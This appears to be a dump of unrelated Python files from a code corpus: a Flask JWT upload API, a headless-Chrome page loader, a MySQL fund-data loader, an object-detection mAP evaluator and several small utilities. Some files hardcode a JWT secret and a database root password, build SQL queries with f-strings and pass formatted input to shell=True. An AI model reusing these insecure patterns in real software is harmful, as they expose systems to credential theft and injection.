+{"seq_id":"540169654","text":"import subprocess\nfrom framework.utils.logger import logger\nfrom blessings import Terminal\nt = Terminal()\n\n\nclass JmapAction(object):\n\n def __init__(self, num, pid):\n\n self.num = num\n self.pid = pid\n\n def heap_dump(self):\n\n \"\"\"\n\n Perform heap dump on target PID\n\n \"\"\"\n\n try:\n for n in range(self.num):\n p = subprocess.Popen(\"jmap -dump:format=b,file=heap{0}.bin {1}\".format(str(n), self.pid), shell=True)\n p.wait()\n except subprocess.CalledProcessError:\n logger(\"warning\", \"Process error!\")\n logger(\"warning\", \"Make sure jmap is in your path\")\n except ValueError:\n logger(\"warning\", \"Argument error!\")","sub_path":"framework/aux/jmap.py","file_name":"jmap.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"70607721","text":"import os\nfrom flask import Flask, jsonify, request\nfrom config import DevConfig\nfrom flask_jwt_extended import (\n JWTManager, jwt_required, create_access_token,\n jwt_refresh_token_required, create_refresh_token,\n get_jwt_identity\n)\nfrom werkzeug.utils import secure_filename\n\n# 初始化 Flask 類別成為 instance\napp = Flask(__name__)\napp.config.from_object(DevConfig)\napp.config['JWT_SECRET_KEY'] = '047db533-4ea6-443d-9ecf-a44ae2d0b8fb' # 加密私鑰\njwt = JWTManager(app)\n\n# 測試用\n@app.route('/')\ndef index():\n return 'Hello World!'\n\n# 登入取得token\n@app.route('/login', methods=['POST'])\ndef login(): \n username = request.json.get('username', None) \n password = request.json.get('password', None) \n\n # 請在這邊實作登入機制,先以TEST做為測試帳密\n if username != 'test' or password != 'test': \n return jsonify({\"msg\": \"Bad username or password\"}), 401\n\n ret = {\n 'access_token': create_access_token(identity=username),\n 'refresh_token': create_refresh_token(identity=username)\n }\n return jsonify(ret), 200\n\n# 更新token\n@app.route('/refresh', methods=['POST'])\n@jwt_refresh_token_required\ndef refresh():\n current_user = get_jwt_identity()\n ret = {\n 'access_token': create_access_token(identity=current_user)\n }\n return jsonify(ret), 200\n\n# 測試token是否正確\n@app.route('/protected', methods=['GET'])\n@jwt_required\ndef protected():\n username = get_jwt_identity()\n return jsonify(logged_in_as=username), 200\n\n\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n# 承接人臉資訊\n@app.route('/facechk', methods=['POST'])\n@jwt_required\ndef upload_image():\n if 'file' not in request.files:\n resp = jsonify({'message' : 'No file part in the request'})\n resp.status_code = 400\n return resp\n file = request.files['file']\n if file.filename == '':\n resp = jsonify({'message' : 'No file selected for uploading'})\n resp.status_code = 400\n return resp\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n # 人臉辨識承接部份\n # file.save(....., filename))\n\n # 人臉辨識成功取得id\n if (1==2):\n resp = jsonify({'id' : filename})\n resp.status_code = 200\n # 辨識不到ID\n else:\n resp = jsonify({'message' : 'Can not found id!!'})\n resp.status_code = 404\n return resp\n else:\n resp = jsonify({'message' : 'Allowed file types are png, jpg, jpeg'})\n resp.status_code = 400\n return resp\n\n\n# 判斷自己執行非被當做引入的模組,因為 __name__ 這變數若被當做模組引入使用就不會是 __main__\nif __name__ == '__main__':\n app.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"58616822","text":"from functools import partial\nfrom uhttp.handlers import html, file\n\nfrom evernotebot.web.admin.api import (\n api_get_logs, api_retry_failed_update, api_login,\n api_send_broadcast_message, api_list_failed_updates\n)\n\n\nauthenticated_html = partial(html, auth_required=True, login_url=\"/login\")\njs_file = partial(file, content_type=\"text/javascript\")\ncss_file = partial(file, content_type=\"text/css\")\n\nurls = (\n # static\n (\"GET\", r\"^/evernotebot.js\", js_file(\"js/evernotebot.js\")),\n (\"GET\", r\"^/evernotebot.css\", css_file(\"css/evernotebot.css\")),\n # View\n (\"GET\", r\"^/login$\", html(\"login.html\")),\n (\"GET\", r\"^/$\", authenticated_html(\"dashboard.html\")),\n (\"GET\", r\"^/logs$\", authenticated_html(\"logs.html\")),\n (\"GET\", r\"^/retry$\", authenticated_html(\"retrying.html\")),\n # API\n (\"POST\", r\"^/api/login$\", api_login),\n (\"GET\", r\"^/api/logs$\", api_get_logs),\n (\"GET\", r\"^/api/failed_updates\", api_list_failed_updates),\n (\"POST\", r\"^/api/retry$\", api_retry_failed_update),\n (\"POST\", r\"^/api/broadcast$\", api_send_broadcast_message),\n)\n","sub_path":"evernotebot/web/admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"287238883","text":"import sys\n\nsys.setrecursionlimit(10 ** 6)\n\ndef solution(node, left, right):\n idx = right; root = node[left]\n for i in range(left + 1, right):\n if node[i] > root:\n idx = i\n break\n \n if idx > left + 1: solution(node, left + 1, idx)\n if idx < right: solution(node, idx, right)\n sys.stdout.write('%d\\n'%root)\n\nif __name__ == '__main__':\n node = []\n\n while True:\n try :\n node.append(int(sys.stdin.readline()))\n except :\n break\n \n solution(node, 0, len(node))","sub_path":"1~10000/5639/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"132300197","text":"# Copyright (c) 2017 crocoite contributors\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nChrome browser interactions.\n\"\"\"\n\nfrom urllib.parse import urlsplit\nfrom base64 import b64decode\nfrom collections import deque\nfrom threading import Event\nfrom http.server import BaseHTTPRequestHandler\nfrom .logger import Level\n\nimport pychrome\n\nclass Item:\n \"\"\"\n Simple wrapper containing Chrome request and response\n \"\"\"\n\n __slots__ = ('tab', 'chromeRequest', 'chromeResponse', 'chromeFinished',\n 'isRedirect', 'failed')\n\n def __init__ (self, tab):\n self.tab = tab\n self.chromeRequest = {}\n self.chromeResponse = {}\n self.chromeFinished = {}\n self.isRedirect = False\n self.failed = False\n\n def __repr__ (self):\n return '- '.format (self.url)\n\n @property\n def request (self):\n return self.chromeRequest.get ('request', {})\n\n @property\n def response (self):\n return self.chromeResponse.get ('response', {})\n\n @property\n def initiator (self):\n return self.chromeRequest['initiator']\n\n @property\n def id (self):\n return self.chromeRequest['requestId']\n\n @property\n def encodedDataLength (self):\n return self.chromeFinished['encodedDataLength']\n\n @property\n def url (self):\n return self.response.get ('url', self.request.get ('url'))\n\n @property\n def parsedUrl (self):\n return urlsplit (self.url)\n\n @property\n def body (self):\n \"\"\" Return response body or None \"\"\"\n try:\n body = self.tab.Network.getResponseBody (requestId=self.id, _timeout=10)\n rawBody = body['body']\n base64Encoded = body['base64Encoded']\n if base64Encoded:\n rawBody = b64decode (rawBody)\n else:\n rawBody = rawBody.encode ('utf8')\n return rawBody, base64Encoded\n except (pychrome.exceptions.CallMethodException, pychrome.exceptions.TimeoutException):\n raise ValueError ('Cannot fetch response body')\n\n @property\n def requestBody (self):\n \"\"\" Get request/POST body \"\"\"\n req = self.request\n postData = req.get ('postData')\n if postData:\n return postData.encode ('utf8'), False\n elif req.get ('hasPostData', False):\n try:\n postData = self.tab.Network.getRequestPostData (requestId=self.id, _timeout=10)['postData']\n return b64decode (postData), True\n except (pychrome.exceptions.CallMethodException, pychrome.exceptions.TimeoutException):\n raise ValueError ('Cannot fetch request body')\n return None, False\n\n @property\n def requestHeaders (self):\n # the response object may contain refined headers, which were\n # *actually* sent over the wire\n return self._unfoldHeaders (self.response.get ('requestHeaders', self.request['headers']))\n\n @property\n def responseHeaders (self):\n return self._unfoldHeaders (self.response['headers'])\n\n @property\n def statusText (self):\n text = self.response.get ('statusText')\n if text:\n return text\n text = BaseHTTPRequestHandler.responses.get (self.response['status'])\n if text:\n return text[0]\n return 'No status text available'\n\n @property\n def resourceType (self):\n return self.chromeResponse.get ('type', self.chromeRequest.get ('type', None))\n\n @staticmethod\n def _unfoldHeaders (headers):\n \"\"\"\n A host may send multiple headers using the same key, which Chrome folds\n into the same item. Separate those.\n \"\"\"\n items = []\n for k in headers.keys ():\n for v in headers[k].split ('\\n'):\n items.append ((k, v))\n return items\n\n def setRequest (self, req):\n self.chromeRequest = req\n\n def setResponse (self, resp):\n self.chromeResponse = resp\n\n def setFinished (self, finished):\n self.chromeFinished = finished\n\nclass BrowserCrashed (Exception):\n pass\n\nclass SiteLoader:\n \"\"\"\n Load site in Chrome and monitor network requests\n\n Chrome’s raw devtools events are preprocessed here (asynchronously, in a\n different thread, spawned by pychrome) and put into a deque. There\n are two reasons for this: First of all, it makes consumer exception\n handling alot easier (no need to propagate them to the main thread). And\n secondly, browser crashes must be handled before everything else, as they\n result in a loss of communication with the browser itself (i.e. we can’t\n fetch a resource’s body any more).\n\n XXX: track popup windows/new tabs and close them\n \"\"\"\n\n __slots__ = ('requests', 'browser', 'url', 'logger', 'queue', 'notify', 'tab')\n allowedSchemes = {'http', 'https'}\n\n def __init__ (self, browser, url, logger):\n self.requests = {}\n self.browser = pychrome.Browser (url=browser)\n self.url = url\n self.logger = logger.bind (context=type (self).__name__, url=url)\n self.queue = deque ()\n self.notify = Event ()\n\n def __enter__ (self):\n tab = self.tab = self.browser.new_tab()\n # setup callbacks\n tab.Network.requestWillBeSent = self._requestWillBeSent\n tab.Network.responseReceived = self._responseReceived\n tab.Network.loadingFinished = self._loadingFinished\n tab.Network.loadingFailed = self._loadingFailed\n tab.Log.entryAdded = self._entryAdded\n tab.Page.javascriptDialogOpening = self._javascriptDialogOpening\n tab.Inspector.targetCrashed = self._targetCrashed\n\n # start the tab\n tab.start()\n\n # enable events\n tab.Log.enable ()\n tab.Network.enable()\n tab.Page.enable ()\n tab.Inspector.enable ()\n tab.Network.clearBrowserCache ()\n if tab.Network.canClearBrowserCookies ()['result']:\n tab.Network.clearBrowserCookies ()\n\n return self\n\n def __exit__ (self, exc_type, exc_value, traceback):\n self.tab.Page.stopLoading ()\n self.tab.stop ()\n self.browser.close_tab(self.tab)\n return False\n\n def __len__ (self):\n return len (self.requests)\n\n def __iter__ (self):\n return iter (self.queue)\n\n def start (self):\n self.tab.Page.navigate(url=self.url)\n\n # use event to signal presence of new items. This way the controller\n # can wait for them without polling.\n def _append (self, item):\n self.queue.append (item)\n self.notify.set ()\n\n def _appendleft (self, item):\n self.queue.appendleft (item)\n self.notify.set ()\n\n # internal chrome callbacks\n def _requestWillBeSent (self, **kwargs):\n reqId = kwargs['requestId']\n req = kwargs['request']\n logger = self.logger.bind (reqId=reqId, reqUrl=req['url'])\n\n url = urlsplit (req['url'])\n if url.scheme not in self.allowedSchemes:\n return\n\n item = self.requests.get (reqId)\n if item:\n # redirects never “finish” loading, but yield another requestWillBeSent with this key set\n redirectResp = kwargs.get ('redirectResponse')\n if redirectResp:\n # create fake responses\n resp = {'requestId': reqId, 'response': redirectResp, 'timestamp': kwargs['timestamp']}\n item.setResponse (resp)\n resp = {'requestId': reqId, 'encodedDataLength': 0, 'timestamp': kwargs['timestamp']}\n item.setFinished (resp)\n item.isRedirect = True\n logger.info ('redirect', uuid='85eaec41-e2a9-49c2-9445-6f19690278b8', target=req['url'])\n self._append (item)\n else:\n logger.warning ('request exists', uuid='2c989142-ba00-4791-bb03-c2a14e91a56b')\n\n item = Item (self.tab)\n item.setRequest (kwargs)\n self.requests[reqId] = item\n logger.debug ('request', uuid='55c17564-1bd0-4499-8724-fa7aad65478f')\n\n def _responseReceived (self, **kwargs):\n reqId = kwargs['requestId']\n item = self.requests.get (reqId)\n if item is None:\n return\n\n resp = kwargs['response']\n logger = self.logger.bind (reqId=reqId, respUrl=resp['url'])\n url = urlsplit (resp['url'])\n if url.scheme in self.allowedSchemes:\n logger.debug ('response', uuid='84461c4e-e8ef-4cbd-8e8e-e10a901c8bd0')\n item.setResponse (kwargs)\n else:\n logger.warning ('scheme forbidden', uuid='2ea6e5d7-dd3b-4881-b9de-156c1751c666')\n\n def _loadingFinished (self, **kwargs):\n \"\"\"\n Item was fully loaded. For some items the request body is not available\n when responseReceived is fired, thus move everything here.\n \"\"\"\n reqId = kwargs['requestId']\n item = self.requests.pop (reqId, None)\n if item is None:\n # we never recorded this request (blacklisted scheme, for example)\n return\n req = item.request\n logger = self.logger.bind (reqId=reqId, reqUrl=req['url'])\n resp = item.response\n if req['url'] != resp['url']:\n logger.error ('url mismatch', uuid='7385f45f-0b06-4cbc-81f9-67bcd72ee7d0', respUrl=resp['url'])\n url = urlsplit (resp['url'])\n if url.scheme in self.allowedSchemes:\n logger.info ('finished', uuid='5a8b4bad-f86a-4fe6-a53e-8da4130d6a02')\n item.setFinished (kwargs)\n self._append (item)\n\n def _loadingFailed (self, **kwargs):\n reqId = kwargs['requestId']\n self.logger.warning ('loading failed',\n uuid='68410f13-6eea-453e-924e-c1af4601748b',\n errorText=kwargs['errorText'],\n blockedReason=kwargs.get ('blockedReason'))\n item = self.requests.pop (reqId, None)\n item.failed = True\n self._append (item)\n\n def _entryAdded (self, **kwargs):\n \"\"\" Log entry added \"\"\"\n entry = kwargs['entry']\n level = {'verbose': Level.DEBUG, 'info': Level.INFO,\n 'warning': Level.WARNING,\n 'error': Level.ERROR}.get (entry.pop ('level'), Level.INFO)\n entry['uuid'] = 'e62ffb5a-0521-459c-a3d9-1124551934d2'\n self.logger (level, 'console', **entry)\n\n def _javascriptDialogOpening (self, **kwargs):\n t = kwargs.get ('type')\n if t in {'alert', 'confirm', 'prompt'}:\n self.logger.info ('js dialog',\n uuid='d6f07ce2-648e-493b-a1df-f353bed27c84',\n action='cancel', type=t, message=kwargs.get ('message'))\n self.tab.Page.handleJavaScriptDialog (accept=False)\n elif t == 'beforeunload':\n # we must accept this one, otherwise the page will not unload/close\n self.logger.info ('js dialog',\n uuid='96399b99-9834-4c8f-bd93-cb9fa2225abd',\n action='proceed', type=t, message=kwargs.get ('message'))\n self.tab.Page.handleJavaScriptDialog (accept=True)\n else:\n self.logger.warning ('js dialog unknown', uuid='3ef7292e-8595-4e89-b834-0cc6bc40ee38', **kwargs)\n\n def _targetCrashed (self, **kwargs):\n self.logger.error ('browser crashed', uuid='6fe2b3be-ff01-4503-b30c-ad6aeea953ef')\n # priority message\n self._appendleft (BrowserCrashed ())\n\nimport subprocess, os, time\nfrom tempfile import mkdtemp\nimport shutil\n\nclass ChromeService:\n \"\"\" Start Google Chrome listening on a random port \"\"\"\n\n __slots__ = ('binary', 'windowSize', 'p', 'userDataDir')\n\n def __init__ (self, binary='google-chrome-stable', windowSize=(1920, 1080)):\n self.binary = binary\n self.windowSize = windowSize\n self.p = None\n\n def __enter__ (self):\n assert self.p is None\n self.userDataDir = mkdtemp ()\n args = [self.binary,\n '--window-size={},{}'.format (*self.windowSize),\n '--user-data-dir={}'.format (self.userDataDir), # use temporory user dir\n '--no-default-browser-check',\n '--no-first-run', # don’t show first run screen\n '--disable-breakpad', # no error reports\n '--disable-extensions',\n '--disable-infobars',\n '--disable-notifications', # no libnotify\n '--headless',\n '--disable-gpu',\n '--hide-scrollbars', # hide scrollbars on screenshots\n '--mute-audio', # don’t play any audio\n '--remote-debugging-port=0', # pick a port. XXX: we may want to use --remote-debugging-pipe instead\n '--homepage=about:blank',\n 'about:blank']\n # start new session, so ^C does not affect subprocess\n self.p = subprocess.Popen (args, start_new_session=True,\n stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n port = None\n # chrome writes its current active devtools port to a file. due to the\n # sleep() this is rather ugly, but should work with all versions of the\n # browser.\n for i in range (100):\n try:\n with open (os.path.join (self.userDataDir, 'DevToolsActivePort'), 'r') as fd:\n port = int (fd.readline ().strip ())\n break\n except FileNotFoundError:\n time.sleep (0.2)\n if port is None:\n raise Exception ('Chrome died on us.')\n\n return 'http://localhost:{}'.format (port)\n\n def __exit__ (self, *exc):\n self.p.terminate ()\n self.p.wait ()\n shutil.rmtree (self.userDataDir)\n self.p = None\n\nclass NullService:\n __slots__ = ('url')\n\n def __init__ (self, url):\n self.url = url\n\n def __enter__ (self):\n return self.url\n\n def __exit__ (self, *exc):\n pass\n\n","sub_path":"crocoite/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":15001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"453326425","text":"import pymysql\nimport pandas as pd\nimport logging\nimport os\n\ndef putFundValueInMysql( fund_file ):\n\t'''根据id将基金数据写入数据库\n\t\t参数:1 id\n\t'''\n\t# 获取基金数据(id, 名称)\n\tfund_values = pd.read_csv(fund_file)\n\tid = fund_file.split('_')[1].split('.')[0]\n\n\t# 连接数据库\n\tconn = pymysql.connect(host='localhost', user='root', password='123456', charset='utf8')\n\tcur = conn.cursor('')\n\tcur.execute('use funddb')\n\n\t# 判断是否已写入mysql\n\tnum = cur.execute(f\"select * from fund_value where fund_id='{id}'\")\n\tif num != 0:\n\t\tlogging.info('[ERROR][putFundValueInMysql] id=%s has exist!', id)\n\t\t# 已经写入, 不用再次写入\n\t\treturn\t\n\n\tlogging.info('[INFO][putFundValueInMysql] begin write id=%s', id)\n\t# 将基金数据写入数据库\n\tfor index, row in fund_values.iterrows():\n\t\tdate = row['fund_date']\n\t\tif date == 'nan':\n\t\t\tcontinue\n\t\tvalue = row['fund_value']\n\t\ttry:\n\t\t\tcur.execute(f\"insert into fund_value(fund_id, date, value) values('{id}','{date}','{value}')\")\n\t\t\tconn.commit()\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tcontinue\n\n\t# 关闭数据库连接\n\tcur.close()\n\tconn.close()\n\treturn\t\n\ndef travelsalFunds():\n\t# 获取fund文件\n\tfile_list = os.listdir('../Data')\n\tfile_list.remove('funds.csv')\n\t\n\tfor fund_file in file_list:\n\t\tfund_file = '../Data/' + fund_file\n\t\tputFundValueInMysql(fund_file)\n\nif __name__ == '__main__':\n\tlogging.basicConfig(filename='logger.log', level=logging.INFO)\n\ttravelsalFunds()\n","sub_path":"17-Zhihu/1709-12-Zhihu/170818TianTianFund/DAO/putFundValueInMysql.py","file_name":"putFundValueInMysql.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"46305998","text":"import option\nimport os, time, shutil\nimport utils_map, size_ap_v2\nimport json\n# from collections import OrderedDict\n\nstart = time.time()\nopt = option.options\n\ngt_json_path = opt.gt_json_path\ndr_json_path = opt.dr_json_path\n\n# if there are no classes to ignore then replace None by empty list\nif opt.ignore is None:\n opt.ignore = []\n\n# make sure that the cwd() is the location of the python script (so that every path makes sense)\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\nresults_files_path = \"results\"\nif not os.path.exists(results_files_path):\n os.makedirs(results_files_path)\nelse:\n shutil.rmtree(results_files_path)\nresult_file_path = results_files_path + \"/results\" + \".txt\"\n\nplot_result_path = \"plot_figures\"\nif opt.draw_plot:\n if opt.plot_save:\n if os.path.exists(plot_result_path):\n shutil.rmtree(plot_result_path)\n os.makedirs(plot_result_path)\n else:\n os.makedirs(plot_result_path)\n\n\nfinal_result_path = \"final_result.json\"\nif not os.path.exists(results_files_path):\n os.makedirs(results_files_path)\nelse:\n shutil.rmtree(results_files_path)\n# result_file_path = final_result_path + \"/results\" + \".json\"\n\n\n\nclass_dict = utils_map.make_gt_list(gt_json_path)\ngt_counter_per_class, gt_counter_per_size, counter_images_per_size, gt \\\n = utils_map.get_gt_match(gt_json_path, class_dict)\n\n\ngt_classes = list(class_dict.values())\n# sort classes alphabetically\n\ngt_classes = sorted(gt_classes)\nn_classes = len(gt_classes)\n\nif opt.set_class_iou is not None:\n utils_map.check_format_class_iou(opt, gt_classes)\ndet_counter_per_classes, dr = utils_map.dr_json(dr_json_path, class_dict)\ndr_classes = list(det_counter_per_classes.keys())\ndr_sizes = [\"small\", \"medium\", \"large\"]\n\n\ncount_true_positives, mAP, ap_dictionary, precision_dict, recall_dict = \\\n utils_map.calculate_ap(result_file_path, plot_result_path, gt_classes, opt, gt_counter_per_class, dr, gt)\n\nsize_count_true_positives = \\\n size_ap_v2.calculate_ap(gt_classes, opt, dr, gt)\n\nwith open(result_file_path, 'a') as results_file:\n\n '''ap for classes'''\n results_file.write(\"\\n# Number of gt objects per class\\n\")\n for class_name in sorted(gt_counter_per_class):\n results_file.write(class_name + \": \" + str(gt_counter_per_class[class_name]) + \"\\n\")\n\n for class_name in dr_classes:\n if class_name not in gt_classes:\n count_true_positives[class_name] = 0\n\n results_file.write(\"\\n# Number of detected objects per class\\n\")\n for class_name in sorted(gt_classes):\n try: n_det = det_counter_per_classes[class_name]\n except: n_det = 0 # If there is no gt class in dt, n_dt = 0\n text = class_name + \": \" + str(n_det)\n text += \" (tp:\" + str(count_true_positives[class_name]) + \"\"\n text += \", fp:\" + str(n_det - count_true_positives[class_name]) + \")\\n\"\n results_file.write(text)\n\n '''ground truth & detection number for sizes'''\n results_file.write(\"\\n# Number of gt objects per size\\n\")\n for class_name in gt_counter_per_size:\n results_file.write(class_name + \": \" + str(gt_counter_per_size[class_name]) + \"\\n\")\n\n results_file.write(\"\\n# Number of detected objects per size\\n\")\n for class_name in dr_sizes:\n text = class_name + \": \" + str(size_count_true_positives[class_name]) + \"\\n\"\n results_file.write(text)\n\nutils_map.print_configuration(result_file_path, opt)\n\n\nfinish = time.time()\nprint(\"time: \", finish - start)\n\n\n\n\"\"\"---------------------------------------------------\"\"\"\n\ndata = {}\ndata[\"mAP\"] = mAP\ndata[\"IoU\"] = opt.iou_threshold\ndata[\"gt_path\"] = gt_json_path\ndata[\"dr_path\"] = dr_json_path\ndata[\"time\"] = finish - start\ndata[\"average precision\"] = ap_dictionary\npositive_dict = {}\nsize_dict = {}\n\nwith open(final_result_path, 'w') as final_result_file:\n for class_name in sorted(gt_counter_per_class):\n try: n_det = det_counter_per_classes[class_name]\n except: n_det = 0\n if class_name not in det_counter_per_classes.keys():\n det_counter_per_classes[class_name] = 0\n positive_dict[class_name] = {\"tp\" : count_true_positives[class_name],\n \"fp\" : n_det - count_true_positives[class_name],\n \"gt_count\" : gt_counter_per_class[class_name],\n \"prediction_count\": det_counter_per_classes[class_name],\n \"precision\": precision_dict[class_name],\n \"recall\": recall_dict[class_name]}\n\n size_dict[\"small\"] = {\"ground_truth\": gt_counter_per_size[\"small\"],\n \"prediction\": size_count_true_positives[\"small\"]}\n\n size_dict[\"medium\"] = {\"ground_truth\": gt_counter_per_size[\"medium\"],\n \"prediction\": size_count_true_positives[\"medium\"]}\n\n size_dict[\"large\"] = {\"ground_truth\": gt_counter_per_size[\"large\"],\n \"prediction\": size_count_true_positives[\"large\"]}\n\n\n data[\"class_count\"] = positive_dict\n data[\"scale_count\"] = size_dict\n json.dump(data, final_result_file)\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"456948955","text":"\"\"\"\nThis file sends the data collected by the script 'swc-main.py'\nto server.\n\"\"\"\n\nimport json\nimport sys\nimport datetime\nimport platform as _platform\n\ntry:\n import httplib as http_client\nexcept ImportError:\n import http.client as http_client\n\n\ndef submit(successes_list, failures_list, HOST):\n \"\"\"\n This function sends the details of failures and successes to server.\n \"\"\"\n\n endpoint = \"/installation_data/\"\n\n try:\n with open('.swc_submission_id', 'r') as f:\n first_line = f.readline()\n unique_id = first_line.split(\"[key:]\")[1]\n date = first_line.split(\"[key:]\")[0]\n if date != str(datetime.date.today()):\n unique_id = None\n except:\n unique_id = None\n\n successful_installs = []\n failed_installs = failures_list\n for checker, version in successes_list:\n successful_installs.append(\n {\n \"name\": checker.full_name(),\n \"version\": version\n }\n )\n\n user_system_info = {\n \"distribution_name\": _platform.linux_distribution()[0],\n \"distribution_version\": _platform.linux_distribution()[1],\n \"system\": _platform.system(),\n \"system_version\": _platform.version(),\n \"machine\": _platform.machine(),\n \"system_platform\": _platform.platform(),\n \"python_version\": _platform.python_version()\n }\n\n headers = {\"Content-Type\": \"application/json\"}\n data = {\n \"successful_installs\": successful_installs,\n \"failed_installs\": failed_installs,\n \"user_system_info\": user_system_info,\n \"unique_user_id\": unique_id\n }\n\n def senddata():\n final_data = json.dumps(data)\n conn = http_client.HTTPConnection(HOST)\n print(\"\\nPushing the data to server....\\n\")\n try:\n conn.request(\"POST\", endpoint, final_data, headers=headers)\n response = conn.getresponse()\n response_string = response.read()\n if response.status == 200:\n print(\"\\nSuccessfully Pushed to Server!\")\n response = json.loads(response_string.decode('utf-8'))\n unique_id = response.get(\"key\")\n file = open('.swc_submission_id', 'w+')\n file.write(str(datetime.date.today()) + \"[key:]\" + unique_id)\n else:\n print(\"\\nSomething bad happened at Server!\")\n except:\n print(\"\\nConnection could not be established with server!\")\n conn.close()\n\n global input\n try:\n input = raw_input # making it compatible for Python 3.x and 2.x\n except NameError:\n pass\n choice = input(\"\\nTo improve our lessons, we gather anonymous data about failed package installations.\"\n \" Can we send anonymous list of your packages? (y/N): \")\n if choice == 'y' or choice == 'Y':\n workshop_id = input(\"Please enter your workshop name (similar to '2016-08-13-place', ask your instructor for details) (none by default): \")\n if not workshop_id:\n workshop_id = None\n email = input(\"What is your email address (none by default): \")\n if not email:\n email = None\n data['user_system_info']['email_id'] = email\n data['user_system_info']['workshop_id'] = workshop_id\n senddata()\n else:\n return\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"382742863","text":"\"\"\"\nPlot LFPs in the time domain.\n\n\"\"\"\n__date__ = \"August - September 2021\"\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import zscore\n\nimport lpne\n\n\n\ndef plot_lfps(lfps, rois=None, t1=0.0, t2=None, fs=1000, y_space=4.0,\n alpha=0.85, lw=1.0, window_duration=None, fn='temp.pdf'):\n \"\"\"\n Plot the LFPs in the specified time range.\n\n Parameters\n ----------\n lfps : dict\n Maps ROI names to LFPs.\n rois : None or list of str\n Which ROIs to plot. If `None`, all the ROIs are plotted.\n t1 : float\n Start time, in seconds.\n t2 : None or float, optional\n End time, in seconds. If `None`, this is taken to be the end\n of the LFP.\n fs : int\n Samplerate, in Hz.\n y_space : float, optional\n Vertical spacing between LFPs.\n alpha : float, optional\n Passed to `pyplot.plot`.\n lw : float, optional\n Passed to `pyplot.plot`.\n window_duration : None or float\n Window duration, in seconds. If `None`, no window markers are plotted.\n fn : str\n Image filename\n \"\"\"\n # Figure out ROIs.\n if rois is None:\n rois = sorted([i for i in lfps.keys() if i not in lpne.IGNORED_KEYS])\n # Figure out times.\n i1 = int(fs * t1)\n if t2 is None:\n i2 = len(lfps[list(lfps.keys())[0]])\n else:\n i2 = int(fs * t2)\n t_vals = np.linspace(t1, t2, i2-i1)\n # Plot.\n lfp_num = 0\n for roi in rois:\n trace = zscore(lfps[roi].flatten()[i1:i2])\n plt.plot(t_vals, lfp_num*y_space+trace, lw=lw, alpha=alpha)\n lfp_num += 1\n pretty_rois = [roi.replace('_', ' ') for roi in rois]\n plt.yticks(\n y_space*np.arange(len(rois)),\n pretty_rois,\n size='xx-small',\n rotation=30,\n )\n ax = plt.gca()\n for dir in ['top', 'left', 'right']:\n ax.spines[dir].set_visible(False)\n if window_duration is not None:\n i1 = int(np.ceil(t1/window_duration))\n i2 = 1 + int(np.floor(t2/window_duration))\n window_ts = [window_duration*i for i in range(i1,i2)]\n for window_t in window_ts:\n plt.axvline(x=window_t, c='k', lw=1.0, ls='--')\n plt.xlabel('Time (s)')\n plt.savefig(fn)\n plt.close('all')\n\n\n\nif __name__ == '__main__':\n pass\n\n\n###\n","sub_path":"lpne/plotting/lfp_plots.py","file_name":"lfp_plots.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
